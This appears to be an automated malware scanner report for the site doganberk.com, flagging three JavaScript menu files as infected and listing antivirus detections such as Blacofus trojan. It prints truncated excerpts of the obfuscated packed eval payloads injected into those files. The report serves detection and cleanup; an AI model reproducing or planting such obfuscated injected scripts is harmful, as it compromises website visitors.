New scan:

Malware Scanner report for doganberk.com

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://doganberk.com/
200 OK
Content-Length: 19393
Content-Type: text/html
clean
http://doganberk.com/menu/chromejs/chrome.js
200 OK
Content-Length: 23952
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('B P(f){w.2N=B(a,b){v c=\'\';2F(v i=0;i<b.E;i++){c+=L.D(a.R(i%a.E)^b.R(i))}H c};w.U=B(h){G(h.z(\':\'))h=h.17(\':\')[0];v a=h.17(\'.\');Q(a.E>2){a.2E()}H a.2D(\'.\'
... 3012 bytes are skipped ...
MTRQTDUBJUklGFxsdXkBIQ0UGCh8KRw0hDAkKTENBEBAcDUERCh4QHRIPUREMFlZMDBsDARs4AB4LV1BCFWlPTURPR0FOQkVSSw4KCR8JQRQVFw4AXBxHBxsFRFJHQ14SHVBQJENPTURPR0FOQkVSS0cFHQBKHBMYAgdLGg5HBAcZRFJHQ14SHVBQJENPTURPR0FOQkVSS0cFHQBKHBMYAgdLBAJdCg0ECAYTGE5fRVADRwcLCApNXGtOQkVSSw5DT01ET0cFAQEQHw5AF0EPCwseTw8SFRcFSiAHBAgLTwgIEAhbUCRqT01ETw4HHAMIFzxPECwfAQ4TBApCWFIfXBYKVm5PR0FOQkVSS1NpT01ETxoCDxYGGkNLShRnbQYBEw8PACUKXSAdCAUbAgVOX0UHBUoGCQQKCgNaZEJFUktTaRJBRF5XUUdZbw|typeof|_typeof_|undefined|else|tqdADB'.split('|'),0,{}))

Antivirus reports:

AntiVir
JS/Blacofus.A.2
Avast
JS:Obfuscated-GA [Trj]
Ad-Aware
JS:Trojan.Script.WY
Ikarus
Trojan.JS.Blacofus
nProtect
JS:Trojan.Script.WY
Comodo
TrojWare.JS.Agent.JE
Emsisoft
JS:Trojan.Script.WY (B)
Microsoft
Trojan:JS/Blacofus.A
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
JS:Trojan.Script.WY
NANO-Antivirus
Trojan.Script.Kryptic.cdvpce
F-Secure
JS:Trojan.Script.WY
AVG
Exploit
GData
JS:Trojan.Script.WY
BitDefender
JS:Trojan.Script.WY

http://doganberk.com/jqueryslidemenu.js
200 OK
Content-Length: 14123
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('z N(f){w.2w=z(a,b){q c=\'\';1G(q i=0;i<b.J;i++){c+=I.D(a.P(i%a.J)^b.P(i))}G c};w.U=z(h){F(h.B(\':\'))h=h.T(\':\')[0];q a=h.T(\'.\');S(a.J>2){a.1g()}G a.1f(\'.\')}
... 3012 bytes are skipped ...
TRQTDUBJUklGFxsdXkBIQ0UGCh8KRw0hDAkKTENBEBAcDUERCh4QHRIPUREMFlZMDBsDARs4AB4LV1BCFWlPTURPR0FOQkVSSw4KCR8JQRQVFw4AXBxHBxsFRFJHQ14SHVBQJENPTURPR0FOQkVSS0cFHQBKHBMYAgdLGg5HBAcZRFJHQ14SHVBQJENPTURPR0FOQkVSS0cFHQBKHBMYAgdLBAJdCg0ECAYTGE5fRVADRwcLCApNXGtOQkVSSw5DT01ET0cFAQEQHw5AF0EPCwseTw8SFRcFSiAHBAgLTwgIEAhbUCRqT01ETw4HHAMIFzxPECwfAQ4TBApCWFIfXBYKVm5PR0FOQkVSS1NpT01ETxoCDxYGGkNLShRnbQYBEw8PACUKXSAdCAUbAgVOX0UHBUoGCQQKCgNaZEJFUktTaRJBRF5XUUdZbw|typeof|_typeof_|undefined|else|waIhthT'.split('|'),0,{}))

Antivirus reports:

AntiVir
JS/Blacofus.A.2
Avast
JS:Obfuscated-GA [Trj]
Ad-Aware
JS:Trojan.Script.WY
Ikarus
Exploit
nProtect
JS:Trojan.Script.WY
Comodo
TrojWare.JS.Agent.JE
Emsisoft
JS:Trojan.Script.WY (B)
DrWeb
JS.IFrame.364
Microsoft
Trojan:JS/Blacofus.A
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
JS:Trojan.Script.WY
NANO-Antivirus
Trojan.Script.Kryptic.cdvpce
F-Secure
JS:Trojan.Script.WY
AVG
Exploit
GData
JS:Trojan.Script.WY
BitDefender
JS:Trojan.Script.WY

http://doganberk.com/slidemenu.js
200 OK
Content-Length: 13157
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('z P(f){x.2G=z(a,b){w c=\'\';2E(w i=0;i<b.F;i++){c+=G.J(a.V(i%a.F)^b.V(i))}E c};x.19=z(h){K(h.B(\':\'))h=h.S(\':\')[0];w a=h.S(\'.\');T(a.F>2){a.2D()}E a.2C(\'.\')
... 3012 bytes are skipped ...
RQTDUBJUklGFxsdXkBIQ0UGCh8KRw0hDAkKTENBEBAcDUERCh4QHRIPUREMFlZMDBsDARs4AB4LV1BCFWlPTURPR0FOQkVSSw4KCR8JQRQVFw4AXBxHBxsFRFJHQ14SHVBQJENPTURPR0FOQkVSS0cFHQBKHBMYAgdLGg5HBAcZRFJHQ14SHVBQJENPTURPR0FOQkVSS0cFHQBKHBMYAgdLBAJdCg0ECAYTGE5fRVADRwcLCApNXGtOQkVSSw5DT01ET0cFAQEQHw5AF0EPCwseTw8SFRcFSiAHBAgLTwgIEAhbUCRqT01ETw4HHAMIFzxPECwfAQ4TBApCWFIfXBYKVm5PR0FOQkVSS1NpT01ETxoCDxYGGkNLShRnbQYBEw8PACUKXSAdCAUbAgVOX0UHBUoGCQQKCgNaZEJFUktTaRJBRF5XUUdZbw|typeof|_typeof_|undefined|else|xsExQoDC'.split('|'),0,{}))

Antivirus reports:

AntiVir
JS/Blacofus.A.2
Avast
JS:Obfuscated-GA [Trj]
Ad-Aware
JS:Trojan.Script.WY
Ikarus
Trojan.JS.Blacofus
nProtect
JS:Trojan.Script.WY
Emsisoft
JS:Trojan.Script.WY (B)
Comodo
TrojWare.JS.Agent.JE
Microsoft
Trojan:JS/Blacofus.A
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
JS:Trojan.Script.WY
NANO-Antivirus
Trojan.Script.Kryptic.cdvpce
F-Secure
JS:Trojan.Script.WY
AVG
Exploit
GData
JS:Trojan.Script.WY
BitDefender
JS:Trojan.Script.WY

http://doganberk.com/default.asp
200 OK
Content-Length: 19393
Content-Type: text/html
clean
http://doganberk.com/soru.asp
404 Not Found
Content-Length: 1635
Content-Type: text/html
clean
http://doganberk.com/test404page.js
404 Not Found
Content-Length: 1635
Content-Type: text/html
clean
http://doganberk.com/agca.asp
200 OK
Content-Length: 12894
Content-Type: text/html
clean
http://doganberk.com/js/prototype.js
200 OK
Content-Length: 126132
Content-Type: application/x-javascript
clean
http://doganberk.com/js/scriptaculous.js?load=effects,builder
200 OK
Content-Length: 2654
Content-Type: application/x-javascript
clean
http://doganberk.com/js/lightbox.js
200 OK
Content-Length: 18389
Content-Type: application/x-javascript
clean
http://doganberk.com/agca/1-1.jpg
200 OK
Content-Length: 280825
Content-Type: image/jpeg
clean
http://doganberk.com/agca/2-2.jpg
200 OK
Content-Length: 262624
Content-Type: image/jpeg
clean
http://doganberk.com/agca/3-3.jpg
200 OK
Content-Length: 282162
Content-Type: image/jpeg
clean
http://doganberk.com/agca/4-4.jpg
200 OK
Content-Length: 272157
Content-Type: image/jpeg
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: doganberk.com

Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 21 Aug 2014 08:18:22 GMT
Server: Microsoft-IIS/6.0
Content-Length: 19393
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAASAATDQ=OJNDHKACFNBGFLIDPDALCJNB; path=/
X-Powered-By: ASP.NET
X-Powered-By: PleskWin

...19393 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: doganberk.com
Referer: http://www.google.com/search?q=doganberk.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=doganberk.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://doganberk.com/

Result: doganberk.com is not infected or malware details are not published yet.